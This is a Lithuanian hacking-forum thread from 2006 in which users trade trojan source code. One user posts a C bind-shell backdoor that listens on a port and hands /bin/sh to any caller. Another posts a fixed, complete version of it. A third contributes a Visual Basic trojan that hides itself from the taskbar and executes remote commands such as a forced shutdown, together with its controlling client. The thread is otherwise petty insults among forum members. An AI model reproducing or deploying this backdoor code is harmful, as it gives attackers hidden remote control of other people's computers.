Puslapis 1 iš 5
Trojanai
Parašytas: 2006 06 16 16:03
shellc0de
Taigi papostinkite savo programavimo žinias. Čia mes programuojam trojanus / backdoors / rootkit'us / gal net pabandysim parodyt kaip reikia rašyt virusus.
Visa informacijai išskirtinai mokslo tikslais.
Prašau nepostint, durnų postų išreiškiančių durnas mintis nesusijusias su programavimu. Kas nors neaišku su c , c++ , asm , kitom programavimo kalbom rašykit, padėsiu kuo galėsiu
Parašytas: 2006 06 16 16:05
shellc0de
P.S Linkėjimai brain5ide ir GodHack
Parašytas: 2006 06 16 17:49
MaksasMks
Taip ir nelabai supratau temos esmės, o ypatingai ką čia pradžioje bandiai pasakyti, manau tau reikėjo paskaityti senesnes šito forumo temas.
Parašytas: 2006 06 16 18:08
GODhack
Informacija padrika ir mazai naudinga. Praverstu nebent tiem kas apie trojanus girdejes iki tol tik is antivirusiniu reklamu arba isvis nieko negirdejes.
Ypac nenaudinga linko neduosiu ir pan. vaikisko lygio blevyzgos: nenori duot info, pasidalint ziniom - nerasyk straipsnio. Akivaizdu. Paskaicius senesnes temas galima rast desimtis kartu daugiau info apie tikrai efektyvius ir isbandytus trojanus. Gal ir nlb grazu taip sukritikuot pirma bandyma, bet tikiuosi nesupyksi.
Trojanai nors is vienos puses yra pelne neslove uz veikla: idek trojana i maila isiusk i 1 000 dezuciu.. Is kitos puses tai nepakieciami irankiai bet kokiame tikrai rimtame isilauzime, o ne zemo lygio DoS atakose kuriu dabar daug ir kuriu atlikejai megsta labai nepagrystai pasikelti pries kitus "kolegas".
Parašytas: 2006 06 16 18:45
Qw3rty
lol, tie trojanai jak mire x(
ilgiau pajieskok ir nete rasi geresniu ...
Parašytas: 2006 06 16 21:05
shellc0de
GODhack rašė:Informacija padrika ir mazai naudinga. Praverstu nebent tiem kas apie trojanus girdejes iki tol tik is antivirusiniu reklamu arba isvis nieko negirdejes.
Ypac nenaudinga linko neduosiu ir pan. vaikisko lygio blevyzgos: nenori duot info, pasidalint ziniom - nerasyk straipsnio. Akivaizdu. Paskaicius senesnes temas galima rast desimtis kartu daugiau info apie tikrai efektyvius ir isbandytus trojanus. Gal ir nlb grazu taip sukritikuot pirma bandyma, bet tikiuosi nesupyksi.
Trojanai nors is vienos puses yra pelne neslove uz veikla: idek trojana i maila isiusk i 1 000 dezuciu.. Is kitos puses tai nepakieciami irankiai bet kokiame tikrai rimtame isilauzime, o ne zemo lygio DoS atakose kuriu dabar daug ir kuriu atlikejai megsta labai nepagrystai pasikelti pries kitus "kolegas".
GodHack kaip ir visada taiklūs komentarai, infromacija padrika, kad žmonės parodytų savo lygį informaciją papildydami ir pataisydami. Aš nepykstu, beto nepirmas bandymas
Bėje šitam forume ir tėra tokie žmonės kurie apie trojanus girdėję iš AV reklamų. ( na gal išskirkim tave, mane ir braina(taip tą brain5ide(kad ir kaip nemalonu) )
Parašytas: 2006 06 16 21:07
shellc0de
noober rašė:lol, tie trojanai jak mire x(
ilgiau pajieskok ir nete rasi geresniu ...
Ne tau sūnau mėšlyną gyvenimą pravėmus ką nors kritikuoti IT saugumo sferoje
Parašytas: 2006 06 16 21:36
Qw3rty
geriau pagalvok pries postinima...
Parašytas: 2006 06 16 21:37
shellc0de
Na kad visokie idiotai neknistų proto, pabandysiu pažvelgti į trojaną iš vidaus ( jo source code ) Nemanau kad visi čia esantys "hakeriai" viską supras, todėl jei kas neaišku klauskit
Taigi po trijų valandų terliojimosi su nano ir gcc pasaulį išvydo dar vienas trojanas skirtas nix sistemai, bet galima paleist ir ant windows :)Ką ??? PRADEDAM:
1. Surenkam reikalingus lib'us
Kodas: Pasirinkti visus
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <strings.h>
2. Nurodom kokio porto klausys musu kurinys, ir koki shell'a jis paleis
3. Sukuriam main funkcija
3.1 I ja irasom pasveikinimo zinute
Kodas: Pasirinkti visus
char *fst = "\nConnected!\n\n";
char *sec = "This tool demonstrated how works trojans\n";
char *thr = "Please enter each command followed by ';'\n";
3.2 Surasom socketo kintamuosius
Kodas: Pasirinkti visus
int outsock, insock, sz;
struct sockaddr_in home;
struct sockaddr_in away;
3.3 Pati idomiausia dalis
trojano smegenys
Kodas: Pasirinkti visus
home.sin_family=AF_INET;
home.sin_port=htons(P);
home.sin_addr.s_addr=INADDR_ANY;
bzero(&(home.sin_zero),8);
signal(SIGCHLD,SIG_IGN);
if((outsock=socket(AF_INET,SOCK_STREAM,0))<0)
exit(printf("Socket error\n"));
if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0))
exit(printf("Bind error\n"));
if((listen(outsock,LISTN))<0)
exit(printf("Listen error\n"));
sz=sizeof(struct sockaddr_in);
for(;;)
{
if((insock=accept(outsock,(struct sockaddr *)&away, &sz))<0)
exit(printf("Accept error"));
if(fork() !=0)
{
send(insock,fst,strlen(fst),0);
send(insock,sec,strlen(sec),0);
send(insock,thr,strlen(thr),0);
dup2(insock,0);
dup2(insock,1);
dup2(insock,2);
execl(SH,SH,(char *)0);
close(insock);
exit(0);
}
close(insock);
Stai pats paprasciausias trojanas, jei kas neaisku pm man ir paaiskinsiu
na aisku jei adminas manes iki tol neuzbanins.
Siuo metu as apsistojes ties rimtu trojanu rasymu, kai bus kas nors parasyta pateiksiu, laukit
ir sekmes.
Kas sake kad lietuviai trojanu neraso ?
shellc0de 2006
Parašytas: 2006 06 16 21:38
shellc0de
noober rašė:geriau pagalvok pries postinima...
O tu geriau nebegalvok, nuo to tik kitiem blogiau
Parašytas: 2006 06 16 23:37
MaksasMks
"shellc0de" Tai ką tu parašiai apie trojano vidų manau suprato tik keli žmonės, o tie kas suprato jiems tai jau ne naujiena turbūt. Šita tekstą apie trojano vidų kaip ir trumpą pamoką pats parašiai ar nukopinai, nes kai jį perskaičiau man atrodo, kad padariai copy>paste. Bėje jeigu ant visų važiuosį ir negerbsi kitų vartotojų nuomonės ilgai čia nebūsi, nors ir kaip tu sakiai, kad prisikelsi, bet iš to jokios naudos ;] Kodėl sakai, kad tave turėtų užbaninti adminas?
Parašytas: 2006 06 17 00:15
GODhack
Jis matyt mano, kad cia pas mus virusu iseities kodu postijimas didelis nusikaltimas.
Parašytas: 2006 06 17 00:24
Lioniax
Truputi pataisytas ir veikiantis variantas:
Kodas: Pasirinkti visus
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <strings.h>
#include <iomanip>
using namespace std;
#define P 12345
#define SH "/bin/sh"
#define LISTN 5
int main(int argc, char **argv){
char *fst = "\nConnected!\n\n";
char *sec = "This tool demonstrated how works trojans\n";
char *thr = "Please enter each command followed by ';'\n";
int outsock, insock, sz;
struct sockaddr_in home;
struct sockaddr_in away;
home.sin_family=AF_INET;
home.sin_port=htons(P);
home.sin_addr.s_addr=INADDR_ANY;
bzero(&(home.sin_zero),8);
signal(SIGCHLD,SIG_IGN);
if((outsock=socket(AF_INET,SOCK_STREAM,0))<0)
exit(printf("Socket error\n"));
if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0))
exit(printf("Bind error\n"));
if((listen(outsock,LISTN))<0)
exit(printf("Listen error\n"));
sz=sizeof(struct sockaddr_in);
socklen_t len = sz;
for(;;)
{
if((insock=accept(outsock,(struct sockaddr *)&away, &len))<0)
exit(printf("Accept error"));
if(fork() !=0)
{
send(insock,fst,strlen(fst),0);
send(insock,sec,strlen(sec),0);
send(insock,thr,strlen(thr),0);
dup2(insock,0);
dup2(insock,1);
dup2(insock,2);
execl(SH,SH,(char *)0);
close(insock);
exit(0);
}
close(insock);
}
}
Edit, ant windows programa neveiks
Parašytas: 2006 06 17 01:24
GODhack
Na ziuriu rasom sorsus tai reik rasyt ir kas ant windows weiks:
VB:
Visi zinoms kad alt+ctl+del SUX tai sita kodo dalis tai isprendzia.
Kodas: Pasirinkti visus
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub
Paislepiam dar geriau. Dabar jau vidutinis vartotojas musu neberas.
Kodas: Pasirinkti visus
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
Esmine dalis atidarom portus
Kodas: Pasirinkti visus
Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
Sita vietele priima susijungima ir paleizdia sekancia funkcija
Kodas: Pasirinkti visus
Public Function DoActions(x As String)
Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function
MSG BOX cheche. be to atkreipiam demesi i shutdown.
Sweikinu trojanas baigtas.
******************
BENDRAS VAIZDELIS:
MAIN
Kodas: Pasirinkti visus
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
MODULE
Kodas: Pasirinkti visus
Public Function DoActions(x As String)
Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function
````````````````````````````````````
Dar galim parasyt kienta to trojano va taip:
Kodas: Pasirinkti visus
Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub
Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub
Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub
Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub
Va tep wyksta su windows ir VB viskas.
Parašytas: 2006 06 17 09:14
shellc0de
GODhack rašė:Jis matyt mano, kad cia pas mus virusu iseities kodu postijimas didelis nusikaltimas.
Dėja, bet taip nemanau
MaksasMks rašė:"shellc0de" Tai ką tu parašiai apie trojano vidų manau suprato tik keli žmonės, o tie kas suprato jiems tai jau ne naujiena turbūt. Šita tekstą apie trojano vidų kaip ir trumpą pamoką pats parašiai ar nukopinai, nes kai jį perskaičiau man atrodo, kad padariai copy>paste. Bėje jeigu ant visų važiuosį ir negerbsi kitų vartotojų nuomonės ilgai čia nebūsi, nors ir kaip tu sakiai, kad prisikelsi, bet iš to jokios naudos ;] Kodėl sakai, kad tave turėtų užbaninti adminas?
Todėl, kad nepirmas kartas ]
turiu savu priezasciu. O ne bl, ne copy paste. Tu žmogau pagalvok ( nors jei Jūs rašydami kokios nors programos source code visko nepatikrintumėt ir rašytumėt tiesiai į forumą, tai būtumėt didžiausias asilas kokį aš esu matęs. O iš čia antra problema : jei jūs viską patikrinot ir paskui dar kartą viską perrašinėjat tai irgi esate didžiausias asilas pasaulyje ) Jei kas nesupranta. Prašom rašykit man privačią žinutę ir viską paaiškinsiu. Dėje nei vienas šitam forume ( išskyrus GODHack ) nenusipelnė, kad AŠ su jaus elgčiausi pagarbei. Dėja, jeigu žmonės suteikia man malonumą pažiūret į jų lygį , tai ...